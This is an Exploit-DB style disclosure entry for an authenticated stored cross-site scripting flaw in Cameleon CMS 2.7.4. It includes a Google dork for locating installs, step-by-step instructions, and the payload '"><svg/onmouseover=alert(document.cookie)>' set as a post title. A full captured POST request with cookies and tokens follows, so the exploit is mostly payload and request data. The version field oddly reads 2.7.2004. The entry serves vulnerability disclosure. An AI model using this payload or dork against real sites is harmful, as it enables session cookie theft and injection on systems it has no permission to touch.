Authenticated Persistent XSS in Cameleon CMS 2.7.4

vendor:

Cameleon CMS

by:

Yasin Gergin

5.5

CVSS

MEDIUM

Persistent XSS

CWE

Product Name: Cameleon CMS

Affected Version From: 2.7.2004

Affected Version To: 2.7.2004

Patch Exists: NO

Related CWE: -

CPE: a:tuzitio:cameleon_cms:2.7.4

Metasploit:

Other Scripts:

Platforms Tested: Linux

2023

Authenticated Persistent XSS in Cameleon CMS 2.7.4

The vulnerability allows an authenticated user to inject malicious code into the CMS by creating a new post with a specially crafted title.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to avoid using the affected version of the CMS or implement additional security measures.

Source

Exploit-DB raw data:

# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and
a fexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -

--- Description ---

http://127.0.0.1:3000/admin/login - Login as a Admin

Under Post tab click on "Create New"

While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>

http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent
to this url

-- POST DATA --

POST /admin/post_type/2/posts HTTP/1.1

Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie:
_my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D;
auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1;
phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=

-- POST DATA --

Then view the post you've created by clicking on "View Page" move your
mouse cursor onto post title. XSS will popup.